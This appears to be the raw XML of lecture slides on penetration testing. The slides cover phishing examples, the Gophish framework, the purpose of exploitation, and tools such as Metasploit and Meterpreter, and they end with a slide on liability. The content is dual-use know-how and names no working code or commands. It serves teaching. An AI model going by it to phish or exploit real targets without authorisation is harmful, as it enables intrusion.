                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD783C9-ECFD-D74B-8EC6-03A23933B147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-169546" b="-169546"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-1384300"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-10-03 at 10.01.42 PM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C89C8ED-804D-3941-9EB9-9C57F7A63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22732"/>
            <a:ext cx="7600573" cy="4087518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2568449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97DCE-F291-FE4A-B46F-723391852385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A1430C-13D1-6247-A77F-5E4FD9A2DF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255132"/>
            <a:ext cx="8686800" cy="5602868"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41976192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F67EC-D6FE-C943-8B5B-E7212A60E2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not Legit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-10-03 at 10.02.06 PM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E03C0BA-065E-8448-A0E2-888FE7517D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2891" b="-92891"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3791529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gophish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open source phishing framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://getgophish.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Written in Go (of course)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="739841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 Shot 2016-06-22 at 2.25.52 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-10779" b="-10779"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="609633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16 at 2.28.08 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-9917" r="-9917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-190266" y="718596"/>
            <a:ext cx="9019371" cy="5682204"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281887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2 at 2.17.45 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-40111" r="-40111"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1380790" y="274638"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-06-22 at 2.17.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520" y="5075238"/>
            <a:ext cx="3930792" cy="1591728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27842338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2 at 2.18.25 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-42511" r="-42511"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-260020" y="274638"/>
            <a:ext cx="9724067" cy="6126162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092362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2 at 2.18.50 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2873" b="-2873"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="5123606" cy="3227872"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-06-22 at 2.19.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51436"/>
            <a:ext cx="9144000" cy="2157478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243282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do we do this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“Proof” of a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Used to reduce false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Can better demonstrate the true level of risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Illustrate the ability of attackers to hide and cover their tracks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Demonstrate the ability to “pivot”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Provide real-world examples of how an attack will present itself on a target network/host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16719605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2 at 2.17.30 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-5631" r="-5631"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2099553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Screen Shot 2016-06-22 at 2.20.40 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-14183" b="-14183"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84404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5701-9968-0449-B71E-9441A15A71B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You don’t need to get fancy…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17BE9C7E-9F35-5D47-B96B-6809F584BE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>We’ve seen fancy phishing attempts (previous slides) and crude ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0"/>
              <a:t>Ex: Go to this Google Form and enter your password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>They all work!  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2013468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7250-5E5C-A747-B176-DCA7CBE15DA8}"/>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15D22B78-8F9C-C44B-9BBF-41FC66AEC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710" y="101217"/>
            <a:ext cx="5127286" cy="5431223"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6FBB46-4F06-1B4F-A864-663AB13B0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188" y="5532440"/>
            <a:ext cx="4381500" cy="1244600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5574389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E63C-28B5-6B48-9D90-714C0C06261B}"/>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48A7FD4D-6279-CB45-9950-C17D2D224A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2549" y="70945"/>
            <a:ext cx="6189302" cy="6694934"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5264079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Exploitation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Core Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Immunity Sec Canvas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Individual tools/scripts/code for individual exploits. (See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> for examples)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="902938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97903-64E4-944D-AB32-FB0998104A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="305461"/>
            <a:ext cx="7620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76359BB-2A16-9046-B859-29218DE184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4119" y="1600200"/>
            <a:ext cx="6526161" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6DD6F6E-017B-A14E-8EC6-FA6A0455BEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698643" y="6400800"/>
            <a:ext cx="6831637" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://twitter.com/JackRhysider/status/1095095178078113792</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3423578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Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Both Free/Community and Paid/Commercial versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Widely used in the community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Framework that offers you exploits as well as post-exploitation tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Great online step-by-step: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1239983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Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Meterpreter is an advanced, dynamically extensible payload that (for Windows uses in-memory DLL injection) stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>aka a shell but better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844972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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Service-side - fires an exploit at the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Client-side - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> listens for an incoming connection (most often as a web server) then delivers exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Single - self-contained payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Stager </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Stages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784701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warnings apply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Protect yourself from liability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
